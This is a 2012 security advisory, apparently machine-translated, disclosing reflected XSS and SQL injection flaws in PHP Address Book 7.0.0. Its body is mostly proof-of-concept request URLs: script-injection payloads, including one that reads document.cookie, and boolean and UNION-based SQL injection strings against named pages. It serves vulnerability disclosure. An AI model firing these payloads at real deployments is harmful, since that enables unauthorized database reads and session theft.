PHP Address Book 7.0.0 plurality of defect and repair-vulnerability warning-the black bar safety net

2012-05-24T00:00:00
ID MYHACK58:62201233963
Type myhack58
Reporter 佚名
Modified 2012-05-24T00:00:00

Description

Title: PHP Address Book 7.0.0 Multiple security vulnerabilities

Author: Stefan Schurtz

Affected Software: Successfully tested on PHP Address Book 7.0.0

Developer website: http://sourceforge.net/projects/php-addressbook/

Defect description

PHP Address Book 7.0.0 containing multiple XSS and SQLi flaws

Test method

// XSS

http://[target]/addressbookv7. 0. 0/preferences. php? from='"</script><script>alert('xss')</script>

http://www.xxx.com /addressbookv7.0.0/group.php/" /><script> alert('xss')</script>

http://[target]/addressbookv7. 0. 0/index. php? group='"</script><script>alert(document. cookie)</script>

// SQLi

http://[target]/addressbookv7. 0. 0/edit. php? id=1 AND 1=IF(1<2,2,1)

http://[target]/addressbookv7. 0. 0/edit. php? id=1 AND 1=IF(1>2,2,1)

// UNION-based Injection, needs 'magic_quotes=off'

http://[target]/addressbookv7. 0. 0/view. php? id=1' UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--+

Fix:

Strengthening filter